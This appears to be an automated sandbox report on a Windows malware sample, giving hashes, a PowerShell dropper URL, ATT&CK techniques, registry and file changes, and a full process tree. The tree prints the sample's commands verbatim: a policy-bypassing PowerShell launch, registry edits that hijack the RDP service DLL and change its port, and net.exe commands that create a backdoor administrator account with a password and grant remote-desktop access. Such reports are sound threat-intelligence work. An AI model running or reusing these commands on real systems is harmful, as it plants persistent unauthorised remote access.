046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211

Analysis

max time kernel
73s
max time network
75s
platform
windows10_x64
resource
win10v20210408
submitted
23-09-2021 10:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f71c575754e1f5890ad8b35afd08b8be.exe
Size

5.9MB
MD5

f71c575754e1f5890ad8b35afd08b8be
SHA1

69803b96f3820fabd81c79d422a1fa2a72ccb699
SHA256

046f08e500cc9156c4af47a73744ccb060606c77d7a8beb5677aa6ff4d256211
SHA512

32f7fab593c46efe2586825aff79688e4a688735bf950b351fe3bdffc4a9dff01da0b2d4a92acf4d4bd14aac362884bd264beced9e8b82fd3111e8ef8ef31301

Score

10^/10

persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

flow	pid	Process
9	1824	powershell.exe
11	1824	powershell.exe
12	1824	powershell.exe
13	1824	powershell.exe
15	1824	powershell.exe
17	1824	powershell.exe
19	1824	powershell.exe
21	1824	powershell.exe
23	1824	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000600000001ab48-361.dat	upx
behavioral2/files/0x000600000001ab49-362.dat	upx

Loads dropped DLL 2 IoCs

pid	Process
2608	Process not Found
2608	Process not Found

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe

Drops file in Windows directory 19 IoCs

description	ioc	Process
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE80A.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE84B.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ijrfa1zy.a44.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE78C.tmp	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE81B.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE85B.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_pkrljybx.gjw.psm1	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2732	reg.exe

Runs net.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	11	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	12	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	13	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	15	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
1268	powershell.exe
1268	powershell.exe
1268	powershell.exe
4020	powershell.exe
4020	powershell.exe
4020	powershell.exe
3896	powershell.exe
3896	powershell.exe
3896	powershell.exe
3996	powershell.exe
3996	powershell.exe
3996	powershell.exe
1268	powershell.exe
1268	powershell.exe
1268	powershell.exe
1824	powershell.exe
1824	powershell.exe
1824	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
620	Process not Found
620	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	636	f71c575754e1f5890ad8b35afd08b8be.exe
Token: SeDebugPrivilege	1268	powershell.exe
Token: SeDebugPrivilege	4020	powershell.exe
Token: SeIncreaseQuotaPrivilege	4020	powershell.exe
Token: SeSecurityPrivilege	4020	powershell.exe
Token: SeTakeOwnershipPrivilege	4020	powershell.exe
Token: SeLoadDriverPrivilege	4020	powershell.exe
Token: SeSystemProfilePrivilege	4020	powershell.exe
Token: SeSystemtimePrivilege	4020	powershell.exe
Token: SeProfSingleProcessPrivilege	4020	powershell.exe
Token: SeIncBasePriorityPrivilege	4020	powershell.exe
Token: SeCreatePagefilePrivilege	4020	powershell.exe
Token: SeBackupPrivilege	4020	powershell.exe
Token: SeRestorePrivilege	4020	powershell.exe
Token: SeShutdownPrivilege	4020	powershell.exe
Token: SeDebugPrivilege	4020	powershell.exe
Token: SeSystemEnvironmentPrivilege	4020	powershell.exe
Token: SeRemoteShutdownPrivilege	4020	powershell.exe
Token: SeUndockPrivilege	4020	powershell.exe
Token: SeManageVolumePrivilege	4020	powershell.exe
Token: 33	4020	powershell.exe
Token: 34	4020	powershell.exe
Token: 35	4020	powershell.exe
Token: 36	4020	powershell.exe
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeIncreaseQuotaPrivilege	3896	powershell.exe
Token: SeSecurityPrivilege	3896	powershell.exe
Token: SeTakeOwnershipPrivilege	3896	powershell.exe
Token: SeLoadDriverPrivilege	3896	powershell.exe
Token: SeSystemProfilePrivilege	3896	powershell.exe
Token: SeSystemtimePrivilege	3896	powershell.exe
Token: SeProfSingleProcessPrivilege	3896	powershell.exe
Token: SeIncBasePriorityPrivilege	3896	powershell.exe
Token: SeCreatePagefilePrivilege	3896	powershell.exe
Token: SeBackupPrivilege	3896	powershell.exe
Token: SeRestorePrivilege	3896	powershell.exe
Token: SeShutdownPrivilege	3896	powershell.exe
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeSystemEnvironmentPrivilege	3896	powershell.exe
Token: SeRemoteShutdownPrivilege	3896	powershell.exe
Token: SeUndockPrivilege	3896	powershell.exe
Token: SeManageVolumePrivilege	3896	powershell.exe
Token: 33	3896	powershell.exe
Token: 34	3896	powershell.exe
Token: 35	3896	powershell.exe
Token: 36	3896	powershell.exe
Token: SeDebugPrivilege	3996	powershell.exe
Token: SeIncreaseQuotaPrivilege	3996	powershell.exe
Token: SeSecurityPrivilege	3996	powershell.exe
Token: SeTakeOwnershipPrivilege	3996	powershell.exe
Token: SeLoadDriverPrivilege	3996	powershell.exe
Token: SeSystemProfilePrivilege	3996	powershell.exe
Token: SeSystemtimePrivilege	3996	powershell.exe
Token: SeProfSingleProcessPrivilege	3996	powershell.exe
Token: SeIncBasePriorityPrivilege	3996	powershell.exe
Token: SeCreatePagefilePrivilege	3996	powershell.exe
Token: SeBackupPrivilege	3996	powershell.exe
Token: SeRestorePrivilege	3996	powershell.exe
Token: SeShutdownPrivilege	3996	powershell.exe
Token: SeDebugPrivilege	3996	powershell.exe
Token: SeSystemEnvironmentPrivilege	3996	powershell.exe
Token: SeRemoteShutdownPrivilege	3996	powershell.exe
Token: SeUndockPrivilege	3996	powershell.exe
Token: SeManageVolumePrivilege	3996	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 636 wrote to memory of 1268	636	f71c575754e1f5890ad8b35afd08b8be.exe	68
PID 636 wrote to memory of 1268	636	f71c575754e1f5890ad8b35afd08b8be.exe	68
PID 1268 wrote to memory of 2376	1268	powershell.exe	70
PID 1268 wrote to memory of 2376	1268	powershell.exe	70
PID 2376 wrote to memory of 2608	2376	csc.exe	71
PID 2376 wrote to memory of 2608	2376	csc.exe	71
PID 1268 wrote to memory of 4020	1268	powershell.exe	72
PID 1268 wrote to memory of 4020	1268	powershell.exe	72
PID 1268 wrote to memory of 3896	1268	powershell.exe	75
PID 1268 wrote to memory of 3896	1268	powershell.exe	75
PID 1268 wrote to memory of 3996	1268	powershell.exe	77
PID 1268 wrote to memory of 3996	1268	powershell.exe	77
PID 1268 wrote to memory of 2716	1268	powershell.exe	79
PID 1268 wrote to memory of 2716	1268	powershell.exe	79
PID 1268 wrote to memory of 2732	1268	powershell.exe	80
PID 1268 wrote to memory of 2732	1268	powershell.exe	80
PID 1268 wrote to memory of 2736	1268	powershell.exe	81
PID 1268 wrote to memory of 2736	1268	powershell.exe	81
PID 1268 wrote to memory of 3980	1268	powershell.exe	84
PID 1268 wrote to memory of 3980	1268	powershell.exe	84
PID 3980 wrote to memory of 696	3980	net.exe	85
PID 3980 wrote to memory of 696	3980	net.exe	85
PID 1268 wrote to memory of 2272	1268	powershell.exe	86
PID 1268 wrote to memory of 2272	1268	powershell.exe	86
PID 2272 wrote to memory of 4092	2272	cmd.exe	87
PID 2272 wrote to memory of 4092	2272	cmd.exe	87
PID 4092 wrote to memory of 772	4092	cmd.exe	88
PID 4092 wrote to memory of 772	4092	cmd.exe	88
PID 772 wrote to memory of 3880	772	net.exe	89
PID 772 wrote to memory of 3880	772	net.exe	89
PID 1268 wrote to memory of 3148	1268	powershell.exe	90
PID 1268 wrote to memory of 3148	1268	powershell.exe	90
PID 3148 wrote to memory of 3996	3148	cmd.exe	91
PID 3148 wrote to memory of 3996	3148	cmd.exe	91
PID 3996 wrote to memory of 1324	3996	cmd.exe	92
PID 3996 wrote to memory of 1324	3996	cmd.exe	92
PID 1324 wrote to memory of 1672	1324	net.exe	93
PID 1324 wrote to memory of 1672	1324	net.exe	93
PID 2720 wrote to memory of 1016	2720	cmd.exe	97
PID 2720 wrote to memory of 1016	2720	cmd.exe	97
PID 1016 wrote to memory of 1908	1016	net.exe	98
PID 1016 wrote to memory of 1908	1016	net.exe	98
PID 2692 wrote to memory of 3704	2692	cmd.exe	101
PID 2692 wrote to memory of 3704	2692	cmd.exe	101
PID 3704 wrote to memory of 1824	3704	net.exe	102
PID 3704 wrote to memory of 1824	3704	net.exe	102
PID 2736 wrote to memory of 3584	2736	cmd.exe	105
PID 2736 wrote to memory of 3584	2736	cmd.exe	105
PID 3584 wrote to memory of 3596	3584	net.exe	106
PID 3584 wrote to memory of 3596	3584	net.exe	106
PID 4020 wrote to memory of 2540	4020	net.exe	110
PID 4020 wrote to memory of 2540	4020	net.exe	110
PID 2004 wrote to memory of 3588	2004	cmd.exe	113
PID 2004 wrote to memory of 3588	2004	cmd.exe	113
PID 3588 wrote to memory of 3060	3588	net.exe	114
PID 3588 wrote to memory of 3060	3588	net.exe	114
PID 1812 wrote to memory of 3888	1812	cmd.exe	117
PID 1812 wrote to memory of 3888	1812	cmd.exe	117
PID 3888 wrote to memory of 1008	3888	net.exe	118
PID 3888 wrote to memory of 1008	3888	net.exe	118
PID 808 wrote to memory of 2888	808	cmd.exe	121
PID 808 wrote to memory of 2888	808	cmd.exe	121
PID 3264 wrote to memory of 724	3264	cmd.exe	124
PID 3264 wrote to memory of 724	3264	cmd.exe	124

C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe
"C:\Users\Admin\AppData\Local\Temp\f71c575754e1f5890ad8b35afd08b8be.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1268
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\43vvo1jn\43vvo1jn.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2376
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7DF5.tmp" "c:\Users\Admin\AppData\Local\Temp\43vvo1jn\CSC732EA7F145834E02AFF745DCAD2D37AF.TMP"
      4⤵
      PID:2608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4020
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3896
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3996
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2716
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:2732
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2736
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3980
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:696
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2272
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4092
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:772
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:3880
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3148
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3996
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1324
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1672
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:1860
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:3728

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:2720
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    PID:1908

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc kEE2SQbH /add
1⤵
- Suspicious use of WriteProcessMemory
PID:2692
- C:\Windows\system32\net.exe
  net.exe user wgautilacc kEE2SQbH /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc kEE2SQbH /add
    3⤵
    PID:1824

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2736
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3584
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    PID:3596

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
1⤵
PID:4032
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4020
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    3⤵
    PID:2540

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2004
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3588
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:3060

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc kEE2SQbH
1⤵
- Suspicious use of WriteProcessMemory
PID:1812
- C:\Windows\system32\net.exe
  net.exe user wgautilacc kEE2SQbH
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3888
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc kEE2SQbH
    3⤵
    PID:1008

